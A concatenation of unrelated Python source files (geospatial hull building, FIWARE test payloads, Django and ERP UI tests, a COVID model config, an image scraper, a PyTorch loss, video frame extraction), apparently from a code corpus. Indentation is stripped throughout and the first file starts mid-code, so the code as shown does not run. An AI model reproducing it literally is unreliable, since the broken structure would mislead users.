for place_id, pts in places.items():
for pt in pts:
place_list.add((len(points), pt+pt, None))
points.append((place_id, Point(pt)))
index = Rtree(place_list)
"""
REASSIGNMENT_PASSES = 10
iterations = 0
count = 0
queue = places.keys() + [None]
while len(queue) > 1:
place_id = queue.pop(0)
if place_id is None:
count = 0
iterations += 1
queue.append(None)
place_id = queue.pop(0)
if not places[place_id]:
del places[place_id]
continue
pts = places[place_id]
count += 1
print >>sys.stderr, "\rIteration #%d of reassignment: %d of %d places..." % (iterations, count, len(queue)),
if iterations > len(pts) / 10.0: continue
old_source_mean, distances = mean_distances(pts)
_, outlier = max(distances)
best = (None, 0.0)
print >>sys.stderr, ""
for nearest in index.nearest(outlier.bounds, 3, objects=True):
#print >>sys.stderr, " -> %s (%d) versus %s (%d)" % (outlier, place_id, Point(nearest.bbox[0:2]), nearest.id)
if nearest.id == place_id: continue
old_target_mean, _ = mean_distances(places[nearest.id])
source = list(pts)
source.remove(outlier)
target = list(places[nearest.id]) + [outlier]
#print >>sys.stderr, " source: new=%d items, old=%d items" % (len(source), len(pts))
new_source_mean, _ = mean_distances(source)
new_target_mean, _ = mean_distances(target)
print >>sys.stderr, " source mean: new=%.6f, old=%.6f" % (old_source_mean, new_source_mean)
print >>sys.stderr, " target mean: new=%.6f, old=%.6f" % (old_target_mean, new_target_mean)
if new_source_mean < old_source_mean and \
new_target_mean < old_target_mean:
improvement = (old_source_mean - new_source_mean) \
+ (old_target_mean - new_target_mean)
if improvement > best[1]:
best = (nearest.id, improvement)
if best[1] > 0:
pts.remove(outlier)
places[best[0]].append(outlier)
queue.append(place_id)
print >>sys.stderr, "%s moved from %d to %d." % (outlier, place_id, best[0])
print >>sys.stderr, "Done."
"""
sample_hulls = {}
count = 0
for place_id, pts in places.items():
hulls = []
if len(pts) < 3:
print >>sys.stderr, "\n ... discarding place #%d" % place_id
continue
for i in range(min(pts,SAMPLE_ITERATIONS)):
multipoint = MultiPoint(random.sample(pts, min(SAMPLE_SIZE, len(pts))))
hull = multipoint.convex_hull
if isinstance(hull, Polygon) and not hull.is_empty: hulls.append(hull)
try:
sample_hulls[place_id] = cascaded_union(hulls)
except:
print >>sys.stderr, hulls
sys.exit()
if hasattr(sample_hulls[place_id], "geoms"):
sample_hulls[place_id] = cascaded_union([hull for hull in sample_hulls[place_id] if type(hull) is Polygon])
count += SAMPLE_ITERATIONS
print >>sys.stderr, "\rComputing %d of %d hulls..." % (count, (len(places) * SAMPLE_ITERATIONS)),
print >>sys.stderr, "\nCombining hull boundaries..."
boundaries = cascaded_union([hull.boundary for hull in sample_hulls.values()])
print >>sys.stderr, "Polygonizing %d boundaries..." % len(boundaries)
rings = list(polygonize(boundaries))
for i, ring in enumerate(rings):
print >>sys.stderr, "\rBuffering %d of %d polygons..." % (i, len(rings)),
size = math.sqrt(ring.area)*0.1
rings[i] = ring.buffer(size)
print >>sys.stderr, "Done."
polygons = {}
count = 0
for polygon in rings:
if polygon.is_empty: continue
place_count = dict((place_id, 0) for place_id in places)
prepared = prep(polygon)
for item in index.intersection(polygon.bounds):
place_id, point = points[item]
if prepared.intersects(point):
place_count[place_id] += 1
pt_count, place_id = max((c, i) for (i, c) in place_count.items())
polys = polygons.setdefault(place_id, [])
polys.append(polygon)
count += 1
print >>sys.stderr, "\rAssigning %d of %d polygons..." % (count,len(rings)),
print >>sys.stderr, "Done."
count = 0
for place_id, polys in polygons.items():
polygons[place_id] = cascaded_union(polys)
count += 1
print >>sys.stderr, "\rUnifying %d of %d polygons..." % (count,len(polygons)),
print >>sys.stderr, "Done."
count = 0
orphans = []
for place_id, multipolygon in polygons.items():
count += 1
print >>sys.stderr, "\rRemoving %d orphans from %d of %d polygons..." % (len(orphans), count, len(polygons)),
if type(multipolygon) is not MultiPolygon: continue
polygon_count = [0] * len(multipolygon)
for i, polygon in enumerate(multipolygon.geoms):
prepared = prep(polygon)
for item in index.intersection(polygon.bounds):
item_id, point = points[item]
if item_id == place_id and prepared.intersects(point):
polygon_count[i] += 1
winner = max((c, i) for (i, c) in enumerate(polygon_count))[1]
polygons[place_id] = multipolygon.geoms[winner]
orphans.extend(p for i, p in enumerate(multipolygon.geoms) if i != winner)
print >>sys.stderr, "Done."
orphans = []
count = 0
changed = True
while changed and orphans:
orphan = orphans.pop(0)
changed = False
count += 1
print >>sys.stderr, "\rReassigning %d of %d orphans..." % (count, len(orphans)),
place_count = dict((place_id, 0) for place_id in places)
total_count = 0.0
prepared = prep(orphan)
for item in index.intersection(orphan.bounds):
item_id, point = points[item]
if prepared.intersects(point):
place_count[item_id] += 1
total_count += 1
for place_id, ct in place_count.items():
if total_count > 0 and float(ct)/total_count > 1/3.0:
polygons[place_id] = polygons[place_id].union(orphan)
changed = True
if not changed:
orphans.append(orphan)
print >>sys.stderr, "Done."
print >>sys.stderr, "\nWriting output."
features = []
for place_id, poly in polygons.items():
features.append({
"type": "Feature",
"id": place_id,
"geometry": poly.__geo_interface__,
"properties": {"woe_id": place_id, "name": names.get(place_id, "")}
})
collection = {
"type": "FeatureCollection",
"features": features
}
print json.dumps(collection)
|
68975
|
from .GrdFile import *
from .MdfFile import *
from .TimeSeriesFile import *
from .GrdFile import *
from .DepFile import *
from .Simulation import *
|
68992
|
subscription_data=\
{
"description": "A subscription to get info about Room1",
"subject": {
"entities": [
{
"id": "Room1",
"type": "Room",
}
],
"condition": {
"attrs": [
"p3"
]
}
},
"notification": {
"http": {
"url": "http://192.168.100.162:8888"
},
"attrs": [
"p1",
"p2",
"p3"
]
},
"expires": "2040-01-01T14:00:00.00Z",
"throttling": 5
}
#data to test the following code for broker.thinBroker.go:946
'''
subReqv2 := SubscriptionRequest{}
err := r.DecodeJsonPayload(&subReqv2)
if err != nil {
rest.Error(w, err.Error(), http.StatusInternalServerError)
return
}
'''
subscriptionWrongPaylaod=\
{
"description": "A subscription to get info about Room1",
"subject": {
"entities": [
{
"id": "Room1",
"type": "Room",
"ispattern":"false"
}
],
"condition": {
"attrs": [
"p3"
]
}
},
"notification": {
"http": {
"url": "http://192.168.100.162:8888"
},
"attrs": [
"p1",
"p2",
"p3"
]
},
"expires": "2040-01-01T14:00:00.00Z",
"throttling": 5
}
v1SubData=\
{
"entities": [
{
"id": "Room1",
"type": "Room",
}
],
"reference": "http://192.168.100.162:8668/ngsi10/updateContext"
}
updateDataWithupdateaction=\
{
"contextElements": [
{
"entityId": {
"id": "Room1",
"type": "Room"
},
"attributes": [
{
"name": "p1",
"type": "float",
"value": 60
},
{
"name": "p3",
"type": "float",
"value": 69
},
{
"name": "p2",
"type": "float",
"value": 32
}
],
"domainMetadata": [
{
"name": "location",
"type": "point",
"value": {
"latitude": 49.406393,
"longitude": 8.684208
}
}
]
}
],
"updateAction": "UPDATE"
}
createDataWithupdateaction=\
{
"contextElements": [
{
"entityId": {
"id": "Room1",
"type": "Room"
},
"attributes": [
{
"name": "p1",
"type": "float",
"value": 90
},
{
"name": "p3",
"type": "float",
"value": 70
},
{
"name": "p2",
"type": "float",
"value": 12
}
],
"domainMetadata": [
{
"name": "location",
"type": "point",
"value": {
"latitude": 49.406393,
"longitude": 8.684208
}
}
]
}
],
"updateAction": "CRETAE"
}
deleteDataWithupdateaction=\
{
"contextElements": [
{
"entityId": {
"id": "Room1",
"type": "Room"
},
"attributes": [
{
"name": "p1",
"type": "float",
"value": 12
},
{
"name": "p3",
"type": "float",
"value": 13
},
{
"name": "p2",
"type": "float",
"value": 14
}
],
"domainMetadata": [
{
"name": "location",
"type": "point",
"value": {
"latitude": 49.406393,
"longitude": 8.684208
}
}
]
}
],
"updateAction": "DELETE"
}
|
68994
|
import unittest
import time
from tir import Webapp
from datetime import datetime
DateSystem = datetime.today().strftime('%d/%m/%Y')
"""-------------------------------------------------------------------
/*/{Protheus.doc} FINA560TestCase
TIR - Casos de testes da rotina movimentos de caixinha
@author <NAME>
@since 23/06/2020
@version 12
-------------------------------------------------------------------"""
class FINA560(unittest.TestCase):
#-------------------------------------------
# Inicialiação setUpClass para TIR - FINA560
#-------------------------------------------
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup("SIGAFIN",DateSystem,"T1","D MG 01 ","06")
inst.oHelper.Program('FINA560')
#-----------------------------------------
#{Protheus.doc} FINA560_CT010
#Valida褯 de inclus䯠de adiantamento com valor maior que o saldo.
#author <NAME>
#since 23/06/2020
#version 1.0
#See https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-
#-----------------------------------------
def test_FINA560_CT010(self):
self.oHelper.WaitShow("Movimento do Caixinha")
self.oHelper.SetButton('Incluir')
self.oHelper.SetBranch('D MG 01')
self.oHelper.SetValue('EU_CAIXA','110')
self.oHelper.SetValue('EU_TIPO','01')
self.oHelper.SetValue('EU_HISTOR','TESTE VALOR')
self.oHelper.SetValue('EU_NRCOMP','00001')
self.oHelper.SetValue('EU_VALOR',"10.000,00")
self.oHelper.SetValue('EU_BENEF','BENEF. TESTE')
self.oHelper.SetValue('EU_CAIXA','120')
self.oHelper.SetButton('Salvar')
self.oHelper.CheckHelp(text='FA560SALDO',button='Fechar')
self.oHelper.WaitShow("Movimento do Caixinha")
self.oHelper.SetButton('Cancelar')
self.oHelper.AssertTrue()
#-------------------------------------------
# Encerramento class para TIR - FINA560
#-------------------------------------------
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main()
|
69017
|
from rest_framework.test import APIClient
from tests.app.serializers import QuoteSerializer
from tests.utils import decode_content
def test_list_response_unfiltered():
response = APIClient().get('/quotes/')
expected = [
{
'character': 'Customer',
'line': "It's certainly uncontaminated by cheese",
'sketch': 'CHEESE SHOP',
},
{
'character': 'The Black Knight',
'line': "It's just a flesh wound",
'sketch': 'HOLY GRAIL',
},
]
content = decode_content(response)
assert content == expected
def test_detail_response_unfiltered():
response = APIClient().get('/quotes/parrot/')
expected = {
'character': 'Shopkeeper',
'line': "Well, he's...he's, ah...probably pining for the fjords",
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_list_response_filtered_includes():
response = APIClient().get('/quotes/?fields=character,line')
expected = [
{
'character': 'Customer',
'line': "It's certainly uncontaminated by cheese",
},
{
'character': 'The Black Knight',
'line': "It's just a flesh wound",
},
]
content = decode_content(response)
assert content == expected
def test_detail_response_filtered_includes():
response = APIClient().get('/quotes/parrot/?fields=character,line')
expected = {
'character': 'Shopkeeper',
'line': "Well, he's...he's, ah...probably pining for the fjords",
}
content = decode_content(response)
assert content == expected
def test_list_response_filtered_excludes():
response = APIClient().get('/quotes/?fields!=character')
expected = [
{
'line': "It's certainly uncontaminated by cheese",
'sketch': 'CHEESE SHOP',
},
{
'line': "It's just a flesh wound",
'sketch': 'HOLY GRAIL',
},
]
content = decode_content(response)
assert content == expected
def test_detail_response_filtered_excludes():
response = APIClient().get('/quotes/parrot/?fields!=character')
expected = {
'line': "Well, he's...he's, ah...probably pining for the fjords",
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_response_filtered_with_some_bogus_fields():
response = APIClient().get('/quotes/parrot/?fields=sketch,spam,eggs')
expected = {
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_response_filtered_with_only_bogus_fields():
response = APIClient().get('/quotes/parrot/?fields=blah')
expected = {}
content = decode_content(response)
assert content == expected
def test_response_filtered_with_multiple_fields_in_separate_query_args():
response = APIClient().get('/quotes/parrot/?fields=character&fields=sketch')
expected = {
'character': 'Shopkeeper',
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_response_filtered_with_include_and_exclude():
response = APIClient().get('/quotes/parrot/?fields=character&fields=sketch&fields!=line')
expected = {
'character': 'Shopkeeper',
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_exclude_wins_for_ambiguous_filtering():
response = APIClient().get('/quotes/parrot/?fields=line,sketch&fields!=line')
expected = {
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_post_ignores_queryfields():
# Ensures that fields aren't dropped for other types of request
response = APIClient().post('/quotes/?fields=line,sketch')
expected = {
'request_method': 'POST',
'serializer_instance_fields': ['character', 'line', 'sketch'],
'request_query': {'fields': 'line,sketch'},
}
content = decode_content(response)
assert content == expected
def test_instantiate_without_request_context():
# just test that it doesn't crash or b0rk the serializer to omit request context
data = {
'character': 'the character',
'line': 'the line',
'sketch': 'the sketch',
}
serializer = QuoteSerializer(data=data)
assert serializer.is_valid()
assert sorted(serializer.get_fields()) == ['character', 'line', 'sketch']
|
69019
|
from __future__ import absolute_import, division, print_function
import os
from idaskins import UI_DIR
from PyQt5 import uic
from PyQt5.Qt import qApp
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QCursor, QFont, QKeySequence
from PyQt5.QtWidgets import QShortcut, QWidget
Ui_ObjectInspector, ObjectInspectorBase = uic.loadUiType(
os.path.join(UI_DIR, 'ObjectInspector.ui')
)
class ObjectInspector(ObjectInspectorBase):
"""
Rudimentary Qt object inspector.
Allows for easier finding of object names and classes
for usage in QSS stylesheets.
"""
def __init__(self, *args, **kwargs):
super(ObjectInspector, self).__init__(*args, **kwargs)
self._selected_widget = None
self._ui = Ui_ObjectInspector()
self._ui.setupUi(self)
# Make everything monospace.
font = QFont('Monospace')
font.setStyleHint(QFont.TypeWriter)
self._ui.teInspectionResults.setFont(font)
# Register signals.
self._update_key = QShortcut(QKeySequence(Qt.Key_F7), self)
self._ui.btnSelectParent.released.connect(self.select_parent)
self._update_key.activated.connect(self.update_inspection)
def update_inspection(self):
widget = qApp.widgetAt(QCursor.pos())
self.update_selected_widget(widget)
def select_parent(self):
if self._selected_widget:
parent = self._selected_widget.parent()
if parent and parent.inherits('QWidget'):
self.update_selected_widget(parent)
def update_selected_widget(self, widget):
if self._selected_widget:
self._selected_widget.destroyed.disconnect(
self.on_selected_widget_destroyed
)
self._selected_widget = widget
if widget:
self._ui.btnSelectParent.setEnabled(widget.parent() is not None)
self._ui.teInspectionResults.setText((
"Type: {}\n"
"Name: {}\n"
"Number of children: {}\n"
"QSS: {}"
).format(
widget.metaObject().className(),
widget.objectName() or '<none>',
len(widget.children()),
widget.styleSheet() or '<none>',
))
self._selected_widget.destroyed.connect(
self.on_selected_widget_destroyed
)
else:
self._ui.teInspectionResults.setText('<no object under cursor>')
def on_selected_widget_destroyed(self, obj):
self._selected_widget = None
|
69044
|
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseForbidden, JsonResponse
from django.shortcuts import get_object_or_404
from django.template.loader import render_to_string
from django.views.generic import View
from .categories import category_value
from .models import Rating
try:
from account.mixins import LoginRequiredMixin
except ImportError: # pragma: no cover
from django.contrib.auth.mixins import LoginRequiredMixin # pragma: no cover
NUM_OF_RATINGS = getattr(settings, "PINAX_RATINGS_NUM_OF_RATINGS", 5)
class RateView(LoginRequiredMixin, View):
def post(self, request, *args, **kwargs):
ct = get_object_or_404(ContentType, pk=self.kwargs.get("content_type_id"))
obj = get_object_or_404(ct.model_class(), pk=self.kwargs.get("object_id"))
rating_input = int(request.POST.get("rating"))
category = request.POST.get("category", "")
cat_choice = category_value(obj, category)
# Check for errors and bail early
if category and cat_choice is None:
return HttpResponseForbidden(
"Invalid category. It must match a preconfigured setting"
)
if rating_input not in range(NUM_OF_RATINGS + 1):
return HttpResponseForbidden(
"Invalid rating. It must be a value between 0 and {}".format(NUM_OF_RATINGS)
)
data = {
"user_rating": rating_input,
"category": category,
"overall_rating": Rating.update(
rating_object=obj,
user=request.user,
category=cat_choice,
rating=rating_input
)
}
# add support for eldarion-ajax
data.update({
"content_type_id": self.kwargs.get("content_type_id"),
"object_id": self.kwargs.get("object_id")
})
data.update({
"html": render_to_string("pinax/ratings/_rating.html", data, request)
})
return JsonResponse(data)
|
69050
|
import covid.models.SEIRD
import covid.models.SEIRD_variable_detection
import covid.models.SEIRD_incident
import covid.util as util
# 2020-04-25 forecast (?)
SEIRD = {
'model' : covid.models.SEIRD.SEIRD,
'args' : {} # use defaults
}
# 2020-05-03 forecast
strongest_prior = {
'model' : covid.models.SEIRD_variable_detection.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100
}
}
# 2020-05-10 forecast
fit_dispersion = {
'model' : covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100
}
}
# State forecasts starting 2020-05-17, all US forecasts
resample_80_last_10 = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10
}
}
# State and US forecasts starting 2020-09-06
longer_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 18.0
}
}
# State and US forecasts starting 2020-09-20, except 2020-10-20
# changed gamma_shape and sigma_shape from 100 to 1000 on 2021-01-10
llonger_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 25.0
}
}
# Less rw
llonger_H_fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0
}
}
# For debugging on May 10
# start with llonger_H_fix
# increase priors on sigma, beta, death_prob, death_rate by factor of 10
debug = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 10000,
'beta_shape': 10,
'death_rate_shape': 100,
'death_prob_conc': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0,
'num_warmup': 100,
'num_samples': 100
}
}
# For debugging on May 10
# start with llonger_H_fix
# increase priors on sigma, beta, death_prob, death_rate by factor of 10
fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 10000,
'beta_shape': 10,
'death_rate_shape': 100,
'death_prob_conc': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0
}
}
# State and US forecasts 2020-10-20
lllonger_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 35.0
}
}
# changed gamma_shape and sigma_shape from 100 to 1000 on 2021-01-10
counties = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'T_future': 8*7
}
}
counties_fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'T_future': 8*7,
'H_duration_est': 25.0,
'beta_shape': 1
}
}
|
69056
|
from winregistry.consts import ShortRootAlias, WinregType
from winregistry.models import RegEntry, RegKey
from winregistry.winregistry import WinRegistry
__all__ = (
"WinRegistry",
"RegEntry",
"RegKey",
"WinregType",
"ShortRootAlias",
)
|
69058
|
import time
print("I will write the same line 3 times, slowly.\n")
time.sleep(2)
for n in range(3):
print("Sleep ... zzz ...")
time.sleep(5)
print("\nThe End")
|
69061
|
from aiohttp_json_api.controller import DefaultController
from aiohttp_json_api.errors import ResourceNotFound
from aiohttp_json_api.fields.decorators import includes
import examples.fantasy.tables as tbl
from examples.fantasy.models import Author
class CommonController(DefaultController):
async def create_resource(self, data, **kwargs):
pass
async def fetch_resource(self, resource_id, **kwargs):
model = self.ctx.schema.opts.resource_cls
async with self.ctx.app['db'].acquire() as connection:
result = await model.fetch_one(connection, resource_id)
if result is None:
raise ResourceNotFound(type=self.ctx.resource_type, id=resource_id)
return result
async def query_collection(self, **kwargs):
model = self.ctx.schema.opts.resource_cls
async with self.ctx.app['db'].acquire() as connection:
results = await model.fetch_many(connection)
return results.values()
async def query_resource(self, resource_id, **kwargs):
return await self.fetch_resource(resource_id, **kwargs)
async def delete_resource(self, resource_id, **kwargs):
pass
class BooksController(CommonController):
@includes('author')
async def include_authors(self, field, resources, **kwargs):
authors_ids = set(r.author.id for r in resources)
if not authors_ids:
return ()
cte = Author.cte(where=(tbl.authors.c.id.in_(authors_ids)))
async with self.ctx.app['db'].acquire() as connection:
results = await Author.fetch_many(connection, cte)
return results.values()
|
69070
|
from funboost import boost
import re
import requests
from parsel import Selector
from pathlib import Path
"""
http://www.5442tu.com/mingxing/list_2_1.html 下载所有明星图片
"""
@boost('xiaoxianrou_list_page', qps=0.05)
def cralw_list_page(page_index):
url = f'http://www.5442tu.com/mingxing/list_2_{page_index}.html'
resp = requests.get(url)
sel = Selector(resp.content.decode('gbk'))
detail_sels = sel.xpath('//div[@class="imgList2"]/ul/li/a[1]')
for detail_sel in detail_sels:
crawl_detail_page.push(detail_sel.xpath('./@href').extract_first(), detail_sel.xpath('./@title').extract_first(), 1, is_first_picture=True)
@boost('xiaoxianrou_detail_page', qps=2, do_task_filtering=True)
def crawl_detail_page(url, title, picture_index, is_first_picture=False,):
resp = requests.get(url)
sel = Selector(resp.content.decode('gbk'))
if is_first_picture: # 详情页图册也需要翻页。
total_page_str = sel.xpath('//div[@class="page"]/ul/li/a/text()').extract_first()
total_page = int(re.search(r'共(\d+)页', total_page_str).group(1))
for p in range(2, total_page + 1):
next_pic_page_url = url[:-5] + f'_{p}.html'
crawl_detail_page.push(next_pic_page_url, title, picture_index=p)
pic_url = sel.xpath('//p[@align="center"]/a/img/@src').extract_first()
resp_pic = requests.get(pic_url)
Path(f'./pictures/{title}/').mkdir(parents=True, exist_ok=True)
(Path(f'./pictures/{title}/') / Path(f'./{title}_{picture_index}.jpg')).write_bytes(resp_pic.content) # 保存图片。
print(f'''保存图片成功:\n {(Path(f'./pictures/{title}/') / Path(f'./{title}_{picture_index}.jpg')).absolute()} ''')
if __name__ == '__main__':
# cralw_list_page(1)
# crawl_detail_page('https://www.5442tu.com/mingxing/20181105/78924.html','范冰冰弟弟范丞丞阳光帅气明星壁纸图片高清',1,True)
cralw_list_page.clear()
crawl_detail_page.clear()
for p in range(1, 10):
cralw_list_page.push(p)
cralw_list_page.consume()
crawl_detail_page.consume()
|
69078
|
import torch
import torch.nn as nn
from dfw.losses import MultiClassHingeLoss, set_smoothing_enabled
def get_loss(args):
if args.opt == 'dfw':
loss_fn = MultiClassHingeLoss()
if 'cifar' in args.dataset:
args.smooth_svm = True
elif args.dataset == 'imagenet':
return EntrLoss(n_classes=args.n_classes)
else:
loss_fn = nn.CrossEntropyLoss()
print('L2 regularization: \t {}'.format(args.weight_decay))
print('\nLoss function:')
print(loss_fn)
if args.cuda:
loss_fn = loss_fn.cuda()
return loss_fn
class EntrLoss(nn.Module):
"""Implementation from https://github.com/locuslab/lml/blob/master/smooth-topk/src/losses/entr.py.
The MIT License
Copyright 2019 Intel AI, CMU, Bosch AI
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
def __init__(self, n_classes, k=5, tau=1.0):
super(EntrLoss, self).__init__()
self.n_classes = n_classes
self.k = k
self.tau = tau
def forward(self, x, y):
n_batch = x.shape[0]
x = x/self.tau
x_sorted, I = x.sort(dim=1, descending=True)
x_sorted_last = x_sorted[:,self.k:]
I_last = I[:,self.k:]
fy = x.gather(1, y.unsqueeze(1))
J = (I_last != y.unsqueeze(1)).type_as(x)
# Could potentially be improved numerically by using
# \log\sum\exp{x_} = c + \log\sum\exp{x_-c}
safe_z = torch.clamp(x_sorted_last-fy, max=80)
losses = torch.log(1.+torch.sum(safe_z.exp()*J, dim=1))
return losses.mean()
|
69085
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("cases", "0012_auto_20150311_0434")]
operations = [
migrations.RemoveField(model_name="case", name="created_by"),
migrations.RemoveField(model_name="case", name="created_on"),
migrations.RemoveField(model_name="case", name="modified_by"),
migrations.RemoveField(model_name="case", name="modified_on"),
]
|
69107
|
from typing import Optional, List
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def _inorder_traversal(self, root: TreeNode, list: List[int]) -> None:
if root == None: return
self._inorder_traversal(root.left, list)
list.append(root.val)
self._inorder_traversal(root.right, list)
def inorderTraversal(self, root: Optional[TreeNode]) -> List[int]:
result = []
self._inorder_traversal(root, result)
return result
|
69117
|
from blaze.expr import symbol
import numpy as np
from datashape import dshape, isscalar
def test_array_dshape():
x = symbol('x', '5 * 3 * float32')
assert x.shape == (5, 3)
assert x.schema == dshape('float32')
assert len(x) == 5
assert x.ndim == 2
def test_element():
x = symbol('x', '5 * 3 * float32')
assert isscalar(x[1, 2].dshape)
assert x[1, 2].dshape == dshape('float32')
assert str(x[1, 2]) == 'x[1, 2]'
x = symbol('x', '5 * float32')
assert isscalar(x[3].dshape)
def test_slice():
x = symbol('x', '5 * 3 * {name: string, amount: float32}')
assert x[2:, 0].dshape == dshape('3 * {name: string, amount: float32}')
assert x[2:].dshape == x[2:, :].dshape
# Make sure that these are hashable
hash(x[:2])
hash(x[0, :2])
assert str(x[1]) == 'x[1]'
assert str(x[:2]) == 'x[:2]'
assert str(x[0, :2]) == 'x[0, :2]'
assert str(x[1:4:2, :2]) == 'x[1:4:2, :2]'
def test_negative_slice():
x = symbol('x', '10 * 10 * int32')
assert x[:5, -3:].shape == (5, 3)
def test_None_slice():
x = symbol('x', '10 * 10 * int32')
assert x[:5, None, -3:].shape == (5, 1, 3)
def test_list_slice():
x = symbol('x', '10 * 10 * int32')
assert x[[1, 2, 3], [4, 5]].shape == (3, 2)
def test_list_slice_string():
x = symbol('x', '10 * 10 * int32')
assert str(x[[1, 2, 3]]) == "x[[1, 2, 3]]"
def test_slice_with_boolean_list():
x = symbol('x', '5 * int32')
expr = x[[True, False, False, True, False]]
assert expr.index == ([0, 3],)
def test_slice_with_numpy_array():
x = symbol('x', '2 * int32')
assert x[np.array([True, False])].isidentical(x[[True, False]])
|
69155
|
from joblib import delayed, Parallel
import os
import sys
import glob
from tqdm import tqdm
import cv2
import argparse
import matplotlib.pyplot as plt
plt.switch_backend('agg')
def str2bool(s):
"""Convert string to bool (in argparse context)."""
if s.lower() not in ['true', 'false']:
raise ValueError('Need bool; got %r' % s)
return {'true': True, 'false': False}[s.lower()]
def extract_video_opencv(v_path, f_root, dim=240):
'''v_path: single video path;
f_root: root to store frames'''
v_class = v_path.split('/')[-2]
v_name = os.path.basename(v_path)[0:-4]
out_dir = os.path.join(f_root, v_class, v_name)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
vidcap = cv2.VideoCapture(v_path)
nb_frames = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
width = vidcap.get(cv2.CAP_PROP_FRAME_WIDTH) # float
height = vidcap.get(cv2.CAP_PROP_FRAME_HEIGHT) # float
if (width == 0) or (height == 0):
print(v_path, 'not successfully loaded, drop ..'); return
new_dim = resize_dim(width, height, dim)
success, image = vidcap.read()
count = 1
while success:
image = cv2.resize(image, new_dim, interpolation = cv2.INTER_LINEAR)
cv2.imwrite(os.path.join(out_dir, 'image_%05d.jpg' % count), image,
[cv2.IMWRITE_JPEG_QUALITY, 80])# quality from 0-100, 95 is default, high is good
success, image = vidcap.read()
count += 1
if nb_frames > count:
print('/'.join(out_dir.split('/')[-2::]), 'NOT extracted successfully: %df/%df' % (count, nb_frames))
vidcap.release()
def resize_dim(w, h, target):
'''resize (w, h), such that the smaller side is target, keep the aspect ratio'''
if w >= h:
return (int(target * w / h), int(target))
else:
return (int(target), int(target * h / w))
def main_UCF101(v_root, f_root):
print('extracting UCF101 ... ')
print('extracting videos from %s' % v_root)
print('frame save to %s' % f_root)
if not os.path.exists(f_root): os.makedirs(f_root)
v_act_root = glob.glob(os.path.join(v_root, '*/'))
print(len(v_act_root))
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.avi'))
v_paths = sorted(v_paths)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root) for p in tqdm(v_paths, total=len(v_paths)))
def main_HMDB51(v_root, f_root):
print('extracting HMDB51 ... ')
print('extracting videos from %s' % v_root)
print('frame save to %s' % f_root)
if not os.path.exists(f_root): os.makedirs(f_root)
v_act_root = glob.glob(os.path.join(v_root, '*/'))
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.avi'))
v_paths = sorted(v_paths)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root) for p in tqdm(v_paths, total=len(v_paths)))
def main_JHMDB(v_root, f_root):
print('extracting JHMDB ... ')
